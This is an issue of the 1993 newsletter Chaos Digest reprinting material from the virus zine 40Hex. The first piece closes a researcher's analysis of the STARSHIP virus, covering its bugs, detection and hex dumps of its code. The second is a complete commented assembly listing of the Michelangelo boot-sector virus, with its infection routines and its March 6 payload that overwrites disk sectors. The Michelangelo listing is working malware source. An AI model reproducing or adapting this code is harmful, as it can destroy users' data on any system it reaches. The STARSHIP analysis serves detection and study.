Chaos Digest Vendredi 2 Juillet 1993 Volume 1 : Numero 68 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.68 (2 Juillet 1993) File 1--40H VMag Number 8 Volume 2 Issue 4 #005(2)-006 (reprint) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Number 8 Volume 2 Issue 4 #005(2)-006 (reprint) 5. ERRORS AND BUGS When STARSHIP infects harddisk it rewrites 6 last sectors on the disk. The contents of these sectors are unrecoverably lost! Moreover, virus controls all disk accesses (via int 13h) to prevent the rewrite of its code (all writes to virus area are simply ignored; error condition is not returned). But if you load DOS from floppy disk and then modify this restricted zone (for example if you write file and it occasionally will occupy the last cluster on the harddisk) - computer will not reboot later and hang. You will need to recreate MBR to overcome this problem. I have determined that the problem may appear when the first used program is MARK (by TurboPower Software). This program is used in combination with RELEASE to remove all resident utilities that were loaded after MARK, to save and restore the interrupt vectors table and state of EMS memory. When MARK remains resident virus glues to its memory block and everything is correct. But when you start RELEASE - computer hangs. This happens because RELEASE restores the interrupts table in its state before (!) shift of virus to the core RAM, when virus was in videomemory. Consequently, vectors 13h and 21h after RELEASE points on videomemory where is no appropriate handlers at this moment - computer immediately hangs. Probably, if you replace your CGA, EGA or VGA adaptor with MDA, your computer will hang after power-up because there will be no space to store virus during reboot. (Virus checks videomemory existence only once - prior to disk infection.) The use of special restoration procedure at address 0:2C0 in the interrupt vectors table must cause the malfunction of computers that uses vectors B0...BB during reboot. (These vectors are used by virus only during reboot, when special restoration procedure is located at address 0:2C0. When virus goes resident in conventional memory all these vectors are cleared with zeroes!) I have detected that some XT computers with RAMDRIVE driver in the CONFIG.SYS did not execute some programs (Harvard Graphics, MS-FORTRAN, QuickBASIC). Some users have reported the problems with the reboot of infected PS/2 model 30. These examples establishes the rule - remove virus when you fixed its presence. There are no harmless viruses. Remember: any infected program may produce malfunction of your computer! 6. STARSHIP DETECTION STARSHIP virus has one special feature - it does not modify any executable file on the harddisk. So if you use passive virus detectors (based on the generation of CRC checks for the files) to test your harddisk - you will never get the warning about virus activity. Each file on the harddisk will remain unchanged. Additionally, if this utility examines the contents of MBR and DOS boot sector, it will not inform you about the infection if it uses simple interrupt 13h. STARSHIP will substitute infected MBR with the original in each access to MBR via int 13h. How to detect the presence of STARSHIP? It is a real problem, because the search of infected files based on the virus descriptor is impossible. No standard software can be used to found STARSHIP. Only specially designed scanning programs that analyses the contents of the EXE header or the code at the file entry point are useful. Here follows some useful hints that may be used to determine the presence of STARSHIP virus. If you have antivirus program AIDSTEST by Lozinsky (version later than 115, April 1991) it can scan and desinfect files (AIDSTEST calls virus "STARSHIP-2616"). Sometimes it refuses to desinfect file and reports something like "Cannot remove virus. Delete file(Y/N)?". If you reboot from original DOS diskette and start FDISK - it shows (Display Partition Information) that Start and End of DOS partition are equal for the infected harddisk. You can also detect the presence of STARSHIP virus in memory if you examine (unassemble) RAM contents at address 0:4B0 with the help of DEBUG (compare with Fig.3). Typically executable files has text messages, tables or zeros at the end. So you can visually examine the tail of executable file and if you will see approximately 2.7 kbytes of garbage - that is suspicious and you may suggest the presence of virus. Experienced programmers may also inspect the program entry point with DEBUG and analyse the disassembled listing. I also recommend not to copy executable files on the floppies directly. Use archive utilities and then copy archives on the floppies. This sequence saves disk space and also preserves from file infection. But this method has one disadvantage. If the initial file is already infected you will not be able to detect the presence of virus because it is incorporated into the archive in compressed form. The identification of STARSHIP virus is complex because it extensively uses XOR coding and uses random masks. In the infected file 100% of virus is encrypted. On disk - 5/6 and in memory - approximately 60%. That is very interesting feature - virus is not available in pure form, being variable on disk, in file and in memory. CONCLUSION To my opinion the investigated virus is a very interesting program. Virus code is highly optimized on the machine-code level. That was possibly done to place the code exactly into 5 sectors on disk. Virus uses various software techniques, it has antitracing and antidisassembling organization, it has no descriptor. These measures were effective to some extent, because I have some problems in source reconstruction. In many cases the source seems to be not fully adequate. The present stage of virus technology is characterized with the complexity of virus search, identification and reconstruction. This tendency to create complex and sneakily viruses seems to be general. For example remember the XOR coded 1701 virus group, the Yankee Doodle [5,6] group of viruses (called also the TP group [3]) that desinfects all debugged infected files [3,5] and smart Century virus [7], SVC series that filters all accesses to the directories and presents original file size for each infected file. The name of virus (STARSHIP_1) reveals the idea of the author to extend the series. Be attentive, remember - the use of backups may save you a vast of time. ACKNOWLEDGEMENTS I am greatly acknowledged to V.V.Snegirev and A.G.Yakovlev for useful discussions. I also like to thank my wife Helen for her understanding and support. I am aknowledged to Vesselin Bontchev, who read the draft variant of the paper and made many valuable comments. I also wish to acknowledge the sponsorship of NPO "POLITON" (Moscow, USSR). REFERENCES [1] Dewdney A.K., In the game called Core War hostile programs engage in a battle of bits, Scientific American, v.250, 5 (1984) 15-19. [2] Cohen F., Computer viruses: theory and experiments, Proc. 2nd IFIP Int. Conf. on Computer Security, (1984) 143-158. [3] Bezrukov N.N., Computer virusology. Part 1: Main work principles, classification and catalog of viruses in DOS operating system, Edition 3.6, date 18.07.1990. (In soft form : files of 745 kbytes total size, 250p. in Russian). [4] McBroom V., Computer viruses: what they are, how to protect against them, Software Protection, v.VIII, 3 (1989) 1-16. [5] Documentation to VIRUSCAN software package from McAfee Assosiates. Version 4.3V66. File-SCANV66.DOC, size-38024. [6] McAfee J., The virus cure, Datamation, v.35, 4 (1989) 29-40. [7] Documentation to Turbo Anti-Virus software package from CARMEL Software Engineering. Version 6.80A. File- README.DOC, size-65566. ================================================================== Table 1. Layout and size of virus procedures. (the box indicates the encrypted memory section) Size Offset (hex) Description 3% 000 - 04F Variables and buffers (see Fig.1) 5% 050 - 0C1 Interrupt 13h handler 10% 0C2 - 1C7 Interrupt 21h handler 11% 1C8 - 312 Active part & check for DOS ready 2% 313 - 340 Random number generator (RND) 7% 341 - 3F7 Interrupts 20h, 21h, 27h handlers +--- encrypted --------------------------------------------+ | 25% 3F8 - 692 Infector of EXE/COM file includes: | | 9% 3F8 - 4DD input logic | | 10% 4DE - 5E9 create infected code | | 6% 5EA - 692 output logic | | 3% 693 - 6E5 Tables | | 3% 6E6 - 738 Startup code for EXE/COM | | 12% 739 - 88F Infect disk | | 2% 891 - 8BF Interrupt 01h handler (trace) | | 11% 8C0 - 9D7 PseudoDOS boot and int B0h handler | +----------------------------------------------------------+ 4% 9D8 - A4E Remover of code from videomemory 2% A4F - A8F Buffers (CS, IP, SS, SP, etc.) ======================================================= Table 2. Minimal and maximal sizes of infected executable files. +-------------+------------------------+ | File type | Minimal Maximal | | | size size | +-------------+------------------------+ | | | | .COM | 1917 62202 | | | | | .EXE | 1917 512 K | +-------------+------------------------+ ============================================================================== Figure 1. Memory block header (M-block) and memory dump of STARSHIP virus located in core RAM. Virus uses segment 18FB, and its memory block is at 18F2:0). ------------------- M-memory block containing virus -------------------------- 18F2:0000 4D 08 00 B0 00 0A 00 A3-8E 0B A1 0C 00 A3 90 0B M............... ------- PSP of file, which termination caused the virus installation --------- 18F3:0000 CD 20 A3 19 00 9A F0 FE-1D F0 2F 01 0B 18 3C 01 . ......../...<. 18F3:0010 0B 18 56 05 0B 18 0B 18-01 01 01 00 02 FF FF FF ..V............. 18F3:0020 FF FF FF FF FF FF FF FF-FF FF FF FF EE 18 E0 FF ................ 18F3:0030 00 90 14 00 18 00 F3 18-FF FF FF FF 00 00 00 00 ................ 18F3:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 18F3:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!........... 18F3:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 ..... 18F3:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........ ------------------ Here follows the code of virus (CS=18FB) ----------------- 18FB:0000 E9 01 10 4E 0A 00 10 00-00 00 00 00 00 42 3A 5C ...N.........B:\ 18FB:0010 54 4D 50 5C 44 52 4F 5A-46 49 4C 41 2E 43 4F 4D TMP\DROZFILA.COM 18FB:0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 18FB:0030 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 18FB:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 FF ................ 18FB:0050 E9 93 06 3E 53 54 41 52-53 48 49 50 5F 31 3C 80 ...>STARSHIP_1<. 18FB:0060 FA 80 75 41 83 F9 01 75-3F 0A F6 75 38 80 FC 02 ..uA...u?..u8... 18FB:0070 75 29 1E 50 E8 13 03 58-9C FF 1E B8 04 1F 72 18 u).P...X......r. 18FB:0080 50 56 72 16 B8 01 00 BE-BE 01 26 89 40 02 B0 01 PVr.......&.@... 18FB:0090 26 88 40 01 5E 58 F8 FB-EB 7C 3C 80 FC 03 74 F6 &.@.^X...|<...t. 18FB:00A0 80 FC 05 74 F1 E9 3E 01-80 FE 08 75 F8 51 02 C8 ...t..>....u.Q.. 18FB:00B0 80 F9 CC 59 72 EF 80 FD-FE 72 EA 80 FC 02 74 D6 ...Yr....r....t. 18FB:00C0 75 D9 FF F1 E8 9C 2E 80-3E 4F 00 00 75 18 50 1E u.......>O..u.P. 18FB:00D0 8C C8 2D 09 00 E8 A9 02-A1 3C 00 48 E8 A2 02 2E ..-......<.H.... 18FB:00E0 F6 16 4F 00 1F 58 80 FC-3C 75 31 2E 83 3E 0B 00 ..O..X.... 18FB:00F0 00 75 6E E8 6E 00 75 69-9D E8 CC 00 72 18 50 51 .un.n.ui....r.PQ ================================================================== Figure 2. Dump of pseudoDOS boot sector (thin line denotes random garbage). 0000 EB 34 90 4D 53 BF 05 00-CD 13 73 09 32 E4 CD 13 .4.MS.....s.2... 0010 4F 75 F5 CD 18 C3 B9 01-00 E8 E9 FF 80 3E 00 7E Ou...........>.~ 0020 EB 75 10 A0 02 7E BB 00-7E E8 97 00 0A E4 74 03 .u...~..~.....t. 0030 80 EF 02 06 53 CB FA 33-C0 8E D0 BC 00 7C 8B F4 ....S..3.....|.. 0040 8E C0 8E D8 FB FC BF 00-06 B9 00 01 F3 A5 EA 53 ...............S 0050 06 00 00 B9 37 00 BE D6-06 BF C0 02 F3 A4 BF B0 ....7........... 0060 04 B9 08 00 F3 A4 1E C5-06 4C 00 AB 8C D8 AB 1F .........L...... 0070 FE 06 FC 7D A1 FC 7D B9-CC FE BB 00 7C BA 80 08 ...}..}.....|... 0080 0A C0 74 08 50 B8 01 03-E8 7A FF 58 41 89 0E DB ..t.P....z.XA... 0090 02 88 36 DF 02 06 BB 00-BB 8E C3 88 26 E7 02 CD ..6.........&... 00A0 B0 26 A2 63 01 26 8C 1E-C2 00 07 FA C7 06 4C 00 .&.c.&........L. 00B0 B0 04 8C 1E 4E 00 FB BB-00 7C B8 06 02 BA 80 00 ....N....|...... 00C0 E9 53 FF 53 51 B9 0A 0A-32 E4 26 30 07 26 02 27 .S.SQ...2.&0.&.' 00D0 43 E2 F7 59 5B C3 C4 02-00 00 50 06 53 B8 00 BB C..Y[.....P.S... 00E0 8E C0 BB 50 00 26 80 3F-E9 74 1E 52 51 B8 05 02 ...P.&.?.t.RQ... 00F0 B9 00 00 BA 80 00 9C 2E-FF 1E B8 04 B0 00 B9 0A ................ 0100 0A 26 30 07 43 E2 FA 59-5A 5B 07 58 CF CD B0 9A .&0.C..YZ[.X.... +--------------------------------+ 0110 5F 00 00 BB EA|1E 0E 1F-8E C0 33 FF 50 FC 32 C0| _.........3.P.2. +--------------------+ | |0120 B9 50 00 F3 AA E8 F6 F7-8B F7 B9 0A 0A F3 A4 E8| .P.............. |0130 98 F9 58 FA A3 B5 04 A3-C1 04 B8 90 90 A3 B0 04| ..X............. |0140 A3 BC 04 C7 06 BF 04 C5-00 B8 EB 05 A3 C8 04 B8| ................ |0150 EB F4 A3 D4 04 BF CA 04-BE DB 04 06 1E 07 A5 A5| ................ |0160 A4 FB A3 D9 04 A3 C8 02-C7 06 E0 02 CD 13 C7 06| ................ |0170 E2 02 EB 0D FE 06 D9 02-CD B0 B9 37 00 BF C0 02| ...........7.... |0180 1E 07 8C D8 F3 AA 07 1F-C3 B4 62 E8 7A F7 C3 90| ..........b.z... |0190 90 90 90 90 90 90 90 90-90 90 A4 4B 4C EA A6 8C| ...........KL... |01A0 BE 23 54 F4 BC E8 B8 6B-5B F1 B2 EC B2 81 5E F6| .#T....k[.....^. |01B0 88 D0 8C BC 64 CC 8E CC-86 69 6A C2 84 C8 80 6F| ....d....ij....o |01C0 FA 2B C0 8E D0 8E C0 8E-D8 B8 00 7C 8B E0 FB 8B| .+.........|.... |01D0 F0 BF 00 7E FC B9 00 01-F3 A5 E9 00 02 B9 10 00| ...~............ |01E0 8B 36 85 7E F6 04 80 75-08 83 EE 10 E2 F6 EB 37| .6.~...u.......7 | +-----------------+ |01F0 90 BF BE 07 57 B9 08 00-F3 A5|74 91 05 AD 55 AA ....W.....t...U. +-----------------------------------+ ================================================================== Figure 3. Dispatcher code located at absolute address 0:4B0. a) virus code located in videomemory 0000:04B0 CD B0 INT B0 <== int 13h 0000:04B2 9A 5F 00 00 BB CALL BB00:005F 0000:04B7 EA 3D A3 00 F0 JMP F000:A33D 0000:04BC CD B0 INT B0 <== int 21h 0000:04BE 9A D6 03 00 BB CALL BB00:03D6 0000:04C3 EA 60 14 73 02 JMP 0273:1460 0000:04C8 CD B0 INT B0 <== int 20h 0000:04CA 9A DD 03 00 BB CALL BB00:03DD 0000:04CF EA 3F 14 73 02 JMP 0273:143F 0000:04D4 CD B0 INT B0 <== int 27h 0000:04D6 9A 93 03 00 BB CALL BB00:0393 0000:04DB EA 66 63 73 02 JMP 0273:6366 b) after removing of code from videomemory (segment CS=18FB is where virus resides) 0000:04B0 90 NOP <== int 13h 0000:04B1 90 NOP 0000:04B2 9A 5F 00 6D 19 CALL 18FB:005F 0000:04B7 EA 3D A3 00 F0 JMP F000:A33D 0000:04BC 90 NOP <== int 21h 0000:04BD 90 NOP 0000:04BE 9A C5 00 6D 19 CALL 18FB:00C5 0000:04C3 EA 3D A3 00 F0 JMP 0273:1460 0000:04C8 EB 05 JMP 4CF <== int 20h 0000:04CA EA 3F 14 73 02 JMP 0273:143F 0000:04CF EA 66 63 73 02 JMP 0273:6366 0000:04D4 EB F4 JMP 4CA <== int 27h =============================================================== All corrections and remarks will be greatly appreciated. Send information directly via E-mail address (MIG@politon.msk.su) or in comp.virus group of USENET (I am monitoring it permanently). F .rs mbyt- tF .rs mbyt- tF . (What is this? -Ed.) +++++ 40Hex Number 8 Volume 2 Issue 4 File 006 ;This is a disassembly of the much-hyped michelangelo virus. ;As you can see, it is a derivative of the Stoned virus. The ;junk bytes at the end of the file are probably throwbacks to ;the Stoned virus. In any case, it is yet another boot sector ;and partition table infector. michelangelo segment byte public assume cs:michelangelo, ds:michelangelo ;Disassembly by Dark Angel of PHALCON/SKISM org 0 jmp entervirus highmemjmp db 0F5h, 00h, 80h, 9Fh maxhead db 2 ;used by damagestuff firstsector dw 3 oldint13h dd 0C8000256h int13h: push ds push ax or dl, dl ;default drive? jnz exitint13h ;exit if not xor ax, ax mov ds, ax test byte ptr ds:[43fh], 1 ;disk 0 on? jnz exitint13h ;if not spinning, exit pop ax pop ds pushf call dword ptr cs:[oldint13h];first call old int 13h pushf call infectdisk ;then infect popf retf 2 exitint13h: pop ax pop ds jmp dword ptr cs:[oldint13h] infectdisk: push ax push bx push cx push dx push ds push es push si push di push cs pop ds push cs pop es mov si, 4 readbootblock: mov ax,201h ;Read boot block to mov bx,200h ;after virus mov cx,1 xor dx,dx pushf call oldint13h jnc checkinfect ;continue if no error xor ax,ax pushf call oldint13h ;Reset disk dec si ;loop back jnz readbootblock jmp short quitinfect ;exit if too many failures checkinfect: xor si,si cld lodsw cmp ax,[bx] ;check if already infected jne infectitnow lodsw cmp ax,[bx+2] ;check again je quitinfect infectitnow: mov ax,301h ;Write old boot block mov dh,1 ;to head 1 mov cl,3 ;sector 3 cmp byte ptr [bx+15h],0FDh ;360k disk? je is360Kdisk mov cl,0Eh is360Kdisk: mov firstsector,cx pushf call oldint13h jc quitinfect ;exit on error mov si,200h+offset partitioninfo mov di,offset partitioninfo mov cx,21h ;Copy partition table cld rep movsw mov ax,301h ;Write virus to sector 1 xor bx,bx mov cx,1 xor dx,dx pushf call oldint13h quitinfect: pop di pop si pop es pop ds pop dx pop cx pop bx pop ax retn entervirus: xor ax,ax mov ds,ax mov ss,ax mov ax,7C00h ;Set stack to just below mov sp,ax ;virus load point sti push ds ;save 0:7C00h on stack for push ax ;later retf mov ax,ds:[13h*4] mov word ptr ds:[7C00h+offset oldint13h],ax mov ax,ds:[13h*4+2] mov word ptr ds:[7C00h+offset oldint13h+2],ax mov ax,ds:[413h] ;memory size in K dec ax ;1024 K dec ax mov ds:[413h],ax ;move new value in mov cl,6 shl ax,cl ;ax = paragraphs of memory mov es,ax ;next line sets seg of jmp mov word ptr ds:[7C00h+2+offset highmemjmp],ax mov ax,offset int13h mov ds:[13h*4],ax mov ds:[13h*4+2],es mov cx,offset partitioninfo mov si,7C00h xor di,di cld rep movsb ;copy to high memory ;and transfer control there jmp dword ptr cs:[7C00h+offset highmemjmp] ;destination of highmem jmp xor ax,ax mov es,ax int 13h ;reset disk push cs pop ds mov ax,201h mov bx,7C00h mov cx,firstsector cmp cx,7 ;hard disk infection? jne floppyboot ;if not, do floppies mov dx,80h ;Read old partition table of int 13h ;first hard disk to 0:7C00h jmp short exitvirus floppyboot: mov cx,firstsector ;read old boot block mov dx,100h ;to 0:7C00h int 13h jc exitvirus push cs pop es mov ax,201h ;read boot block mov bx,200h ;of first hard disk mov cx,1 mov dx,80h int 13h jc exitvirus xor si,si cld lodsw cmp ax,[bx] ;is it infected? jne infectharddisk ;if not, infect HD lodsw ;check infection cmp ax,[bx+2] jne infectharddisk exitvirus: xor cx,cx ;Real time clock get date mov ah,4 ;dx = mon/day int 1Ah cmp dx,306h ;March 6th je damagestuff retf ;return control to original ;boot block @ 0:7C00h damagestuff: xor dx,dx mov cx,1 smashanothersector: mov ax,309h mov si,firstsector cmp si,3 je smashit mov al,0Eh cmp si,0Eh je smashit mov dl,80h ;first hard disk mov maxhead,4 mov al,11h smashit: mov bx,5000h ;random memory area mov es,bx ;at 5000h:5000h int 13h ;Write al sectors to drive dl jnc skiponerror ;skip on error xor ah,ah ;Reset disk drive dl int 13h skiponerror: inc dh ;next head cmp dh,maxhead ;2 if floppy, 4 if HD jb smashanothersector xor dh,dh ;go to next head/cylinder inc ch jmp short smashanothersector infectharddisk: mov cx,7 ;Write partition table to mov firstsector,cx ;sector 7 mov ax,301h mov dx,80h int 13h jc exitvirus mov si,200h+offset partitioninfo ;Copy partition mov di,offset partitioninfo ;table information mov cx,21h rep movsw mov ax,301h ;Write to sector 8 xor bx,bx ;Copy virus to sector 1 inc cl int 13h ;* jmp short 01E0h db 0EBh, 32h ;?This should crash? ;The following bytes are meaningless. garbage db 1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h partitioninfo: db 42h dup (0) michelangelo ends end ------------------------------ End of Chaos Digest #1.68 ************************************